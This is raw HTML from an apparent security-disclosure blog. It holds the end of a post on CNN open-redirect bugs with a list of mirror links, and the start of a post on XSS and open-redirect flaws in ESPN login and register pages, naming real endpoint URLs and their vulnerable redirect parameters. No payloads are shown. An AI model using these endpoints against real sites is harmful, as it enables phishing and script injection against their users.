<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be</a></span></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-ads-open-redirect-security.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-ads-open-redirect-security.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;"><br class="Apple-interchange-newline" />Those vulnerabilities were reported to CNN in early July by Contact from Here. But they are still not been patched yet.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;"><a href="http://edition.cnn.com/feedback/#cnn_FBKCNN_com" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://edition.cnn.com/feedback/#cnn_FBKCNN_com</a></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/128">http://seclists.org/fulldisclosure/2014/Dec/128</a></span></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2014/12/29/6"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/12/29/6</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395</span></a></div>
<div style="margin: 0px;">
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141988778706126&w=2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a></div>
<div style="margin: 0px;">
<a href="http://securitypost.tumblr.com/post/107868680057/ithut-cnn-cnn-com-travel-city-related-links"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypost.tumblr.com/post/107868680057/ithut-cnn-cnn-com-travel</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_5500df0">http://ittechnology.lofter.com/post/1cfbf60d_5500df0</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ithut.tumblr.com/post/120833062743/cnn-xss-url-redirection-bug" target="_blank">http://ithut.tumblr.com/post/<wbr></wbr>120833062743/cnn-xss-url-<wbr></wbr>redirection-bug</a></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/it-news/cnn-xss-url-redirect-bug/">http://www.tetraph.com/blog/it-news/cnn-xss-url-redirect-bug/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://tetraph.blogspot.com/2015/06/cnn-xss-redirect-bug.html" style="font-family: Arial, Helvetica, sans-serif;">http://tetraph.blogspot.com/2015/06/cnn-xss-redirect-bug.html</a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://biyiniao.wordpress.com/2015/01/08/cnn-xss-open-redirect-bug/" target="_blank">https://biyiniao.wordpress.<wbr></wbr>com/2015/01/08/cnn-xss-open-<wbr></wbr>redirect-bug/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://whitehatpost.blog.163.com/blog/static/24223205420155613753998/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155613753998/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://plus.google.com/u/0/+wangfeiblackcookie/posts/bFkukxiUfXK"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/+wangfeiblackcookie/posts/bFkukxiUfXK</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=674936469318135&id=594347777377005" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>674936469318135</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://diebiyi.com/articles/news/cnn-xss-url-redirect-bug/">http://diebiyi.com/articles/news/cnn-xss-url-redirect-bug/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/yangziyou/status/607060937309159425">https://twitter.com/yangziyou/status/607060937309159425</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://redysnowfox.wordpress.com/2014/12/31/cnn-xss-url-redirect-bug/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://redysnowfox.wordpress.com/2014/12/31/cnn-xss-url-redirect-bug/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=1043534509019886&id=922151957824809" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>1043534509019886</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://whitehatpost.lofter.com/post/1cc773c8_7338196" style="font-family: Arial, Helvetica, sans-serif;" target="_blank">http://whitehatpost.lofter.<wbr></wbr>com/post/1cc773c8_7338196</a></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-xss-and-ads-open.html">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-travel-xss-and</a></span></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<br class="Apple-interchange-newline" /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-74213500690982455962015-06-05T07:50:00.000-07:002015-06-05T07:58:41.214-07:00ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYa9hV3KatYUKjHawzyNfywFMP220t68vvrjesDIzBwHCvNETtbJjStSSBmNs-wVwZW6igeziSSViRWE1WyyGbpuR2KUXVZqRrhyNTuP5ZdpDy9hC6ka0HMKUVPnwR6aNoXU8uIXijdI/s1600/espn_games_xss1.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYa9hV3KatYUKjHawzyNfywFMP220t68vvrjesDIzBwHCvNETtbJjStSSBmNs-wVwZW6igeziSSViRWE1WyyGbpuR2KUXVZqRrhyNTuP5ZdpDy9hC6ka0HMKUVPnwR6aNoXU8uIXijdI/s1600/espn_games_xss1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<br /></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">http://espn.go.com/</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px;">"ESPN (originally an acronym for Entertainment and Sports Programming Network) is a U.S.-based global cable and satellite television channel that is owned by ESPN Inc., a joint venture between The Walt Disney Company (which operates the network, through its 80% controlling ownership interest) and Hearst Corporation (which holds the remaining 20% interest). The channel focuses on sports-related programming including live and recorded event telecasts, sports news and talk shows, and other original programming.</span></span></div>
<div style="text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 19.7037048339844px; text-align: justify;">ESPN broadcasts primarily from studio facilities located in Bristol, Connecticut. The network also operates offices in Miami, New York City, Seattle, Charlotte, and Los Angeles. John Skipper currently serves as president of ESPN, a position he has held since January 1, 2012. While ESPN is one of the most successful sports networks, it has been subject to criticism, which includes accusations of biased coverage, conflict of interest, and controversies with individual broadcasters and analysts. ESPN headquarters in Bristol, Connecticut. As of February 2015, ESPN is available to approximately 94,396,000 paid television households (81.1% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brazil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada.</span><span style="line-height: 19.7037048339844px; text-align: justify;">"(Wikipedia)</span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.7037048339844px; text-align: justify;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://espn.go.com/" target="_blank">Espn.go.com</a> has a cyber security bug problem. It is vulnerable to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities are very dangerous. Since they happen at ESPN's "login" & "register" pages that are credible. Attackers can abuse those links to mislead ESPN's users. The success rate of attacks may be high.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">During the tests, besides the links given above, large number of ESPN's links are vulnerable to those attacks.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The programming code flaw occurs at "espn.go.com"'s "login?" & "register" pages with "redirect" parameter, i.e.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2F%<wbr></wbr>2Fr.espn.go.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://games.espn.go.com/<wbr></wbr>world-cup-bracket-predictor/<wbr></wbr>2014/es/login?redirect=</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://register.go.com/go/<wbr></wbr>sendMemberNames?regFormId=<wbr></wbr>espn&appRedirect=http://<wbr></wbr>register.go.com/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
